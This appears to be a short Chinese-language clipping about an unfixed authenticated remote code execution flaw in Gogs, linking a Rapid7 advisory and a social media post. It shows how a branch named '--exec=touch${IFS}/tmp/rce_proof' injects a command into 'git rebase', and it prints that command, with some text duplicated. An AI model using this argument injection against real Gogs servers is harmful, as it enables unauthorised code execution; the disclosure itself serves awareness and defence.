Gogs RCE (NOT FIXED)
创建一个名为
git rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'
https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
https://x.com/_CryptoCat/status/2059987039198601673
创建一个名为
--exec=touch${IFS}/tmp/rce_proof 的 branchgit rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'
https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
https://x.com/_CryptoCat/status/2059987039198601673
Rapid7
Authenticated RCE via Argument Injection in Gogs (NOT FIXED)
